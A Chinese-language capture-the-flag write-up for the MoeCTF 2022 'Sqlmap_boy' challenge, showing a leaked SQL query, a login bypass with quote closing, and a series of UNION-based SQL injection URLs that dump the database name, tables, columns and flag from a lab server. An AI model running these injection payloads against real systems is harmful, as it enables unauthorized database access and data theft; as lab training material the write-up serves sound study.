[MoeCTF-2022]Sqlmap_boy


title:[MoeCTF 2022]Sqlmap_boy

查看网页源代码,得到提示

image-20240424221247573

<!-- $sql = 'select username,password from users where username="'.$username.'" && password="'.$password.'";'; -->

用万能密码绕过,用’"闭合

image-20240424221604039

爆数据库

http://node5.anna.nssctf.cn:24995/secrets.php?id=-1'%20union%20select%201,database(),3--+

image-20240424221843355

爆表

http://node5.anna.nssctf.cn:24995/secrets.php?id=-1'%20union%20select%201,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

image-20240424221900272

爆字段

http://node5.anna.nssctf.cn:24995/secrets.php?id=-1'%20union%20select%201,database(),group_concat(column_name) from information_schema.columns where table_name='flag'--+

image-20240424222327177

爆字段内容

http://node5.anna.nssctf.cn:24995/secrets.php?id=-1'%20union%20select%201,database(),group_concat(flAg) from moectf.flag--+

image-20240424222459530

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-28 17:22:10       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-28 17:22:10       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-28 17:22:10       87 阅读
  4. Python语言-面向对象

    2024-04-28 17:22:10       96 阅读

热门阅读

  1. 计算机网络复习(第一章概述)

    2024-04-28 17:22:10       27 阅读
  2. 2024.4.28每日一题

    2024-04-28 17:22:10       33 阅读
  3. 服务器不稳定会不会影响网站运行?

    2024-04-28 17:22:10       29 阅读
  4. 目标检测的迁移学习

    2024-04-28 17:22:10       27 阅读
  5. Web Service接口的HttpURLConnection调用

    2024-04-28 17:22:10       30 阅读
  6. C++指针的比较

    2024-04-28 17:22:10       194 阅读
  7. 小明的勇者之路:挑战极限,战胜未来!

    2024-04-28 17:22:10       99 阅读
  8. 关系型数据库管理系统!SQL Server !

    2024-04-28 17:22:10       117 阅读